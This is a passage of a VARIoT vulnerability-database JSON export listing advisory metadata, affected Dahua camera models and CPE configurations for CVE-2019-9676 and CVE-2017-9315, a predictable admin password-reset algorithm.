"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/163559"
},
{
"title": "Dahua IPC-HFW1XXX , IPC-HDW1XXX and IPC-HFW2XXX Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=93789"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "NVD",
"id": "CVE-2019-9676"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://www.dahuasecurity.com/support/cybersecurity/details/617"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9676"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-9676"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-11T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"date": "2019-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"date": "2019-06-12T15:29:00.957000",
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"date": "2019-06-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-15T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-17496"
},
{
"date": "2019-06-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-005507"
},
{
"date": "2019-06-17T19:13:22.717000",
"db": "NVD",
"id": "CVE-2019-9676"
},
{
"date": "2019-06-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "local",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural Dahua IP Camera Buffer error vulnerability in product devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-005507"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-556"
}
],
"trust": 0.6
}
}
VAR-201711-1047
Vulnerability from variot - Updated: 2023-12-18 13:57Customer of Dahua IP camera or IP PTZ could submit relevant device information to receive a time limited temporary password from Dahua authorized dealer to reset the admin password. The algorithm used in this mechanism is potentially at risk of being compromised and subsequently utilized by attacker. Dahua IP Camera and IP PTZ Contains a cryptographic vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dahua Technology IP Camera. Authentication is not required to exploit this vulnerability.The specific flaw exists within the disaster recovery password functionality. If the device uses its default settings, the password generation algorithm produces a predictable result. An attacker can leverage this vulnerability to gain control of the device under attack. Dahua IPC-HFW and others are network camera equipment of Dahua Company of China. There are security vulnerabilities in several Dahua products. An attacker could use this vulnerability to reset the administrator password. Dahua IPC-HFW, etc. The following products are affected: Dahua IPC-HFW1XXX Build 2015/07 to 2017/03; IPC-HDW1XXX Build 2015/07 to 2017/03; IPC-HDBW1XXX Build 2015/07 to 2017/03; IPC- HFW2XXX Build 2015/07 to 2017/03; IPC-HDW2XXX Build 2015/07 to 2017/03; IPC-HDBW2XXX Build 2015/07 to 2017/03; IPC-HFW4XXX Build 2015/07 to 2017 /03 version; IPC-HDW4XXX Build 2015/07 to 2017/03 version; IPC-HDBW4XXX Build 2015/07 to 2017/03 version; IPC-HF5XXX Build 2015/07 to 2017/03 version; IPC-HFW5XXX Build 2015/07 to 2017/03; IPC-HDW5XXX Build 2015/07 to 2017/03; IPC-HDBW5XXX Build 2015/07 to 2017/03; IPC-HF8XXX Build 2015/07 to 2017/03 Version; IPC-HFW8XXX Build 2015/07 to 2017/03; IPC-HDBW8XXX Build 2015/07 to 2017/03; IPC-EBW8XXX Build 2015/07 to 2017/03; IPC-PFW8xxx Build 2015/ 07 version to 2017/03 version; IPC-PDBW8xxx Build 2015/07 version to 2017/03 version; IPC-HUM8xxx Build 2015/07 version to 2017/03 version
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201711-1047",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ipc-hfw1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hfw2xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hf5xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hfw4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdbw2xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdw2xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdw4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdbw1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdw1xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdbw4xxx",
"scope": "eq",
"trust": 1.6,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-sd5xxxxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdbw8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdbw5xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-sd2xxxxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-sd4xxxxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-ebw8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-pdbw8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hum8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-pfw8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hdw5xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-sd6xxxxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hfw8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hf8xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "psd8xxxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "ipc-hfw5xxx",
"scope": "eq",
"trust": 1.0,
"vendor": "dahuasecurity",
"version": null
},
{
"model": "dh-ipc-hdw1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hdw4xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-ipc-hfw1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-sd2xxxxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-sd4xxxxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-sd5xxxxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "dh-sd6xxxxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-ebw8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw1xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw4xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdbw8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hdw5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hf5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hf8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw2xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw4xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw5xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hfw8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-hum8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-pdbw8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ipc-pfw8xxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "psd8xxxx",
"scope": null,
"trust": 0.8,
"vendor": "dahua",
"version": null
},
{
"model": "ip camera",
"scope": null,
"trust": 0.7,
"vendor": "dahua",
"version": null
},
{
"model": "security ipc-hf5xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hfw5xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdw5xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdbw5xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hf8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hfw8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdbw8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-ebw8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-pfw8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-pdbw8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hum8xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security psd",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hfw1xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdw1xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdbw1xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hfw2xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdw2xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdbw2xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hfw4xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security ipc-hdw4xxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security dh-sd6xxxxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security dh-sd5xxxxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security dh-sd4xxxxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
},
{
"model": "security dh-sd2xxxxx",
"scope": "gte",
"trust": 0.6,
"vendor": "dahua",
"version": "2015/07,\u003c=2017/03"
}
],
"sources": [
{
"db": "ZDI",
"id": "ZDI-18-130"
},
{
"db": "CNVD",
"id": "CNVD-2017-38224"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011143"
},
{
"db": "NVD",
"id": "CVE-2017-9315"
},
{
"db": "CNNVD",
"id": "CNNVD-201705-1393"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw1xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw1xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw2xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw2xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw4xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw4xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf5xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hf5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw5xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw5xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw5xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw5xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hf8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-ebw8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-ebw8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-pfw8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-pfw8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd2xxxxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd2xxxxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-pdbw8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-pdbw8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum8xxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum8xxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:psd8xxxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:psd8xxxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd4xxxxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd4xxxxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd5xxxxx_firmware:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd5xxxxx:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
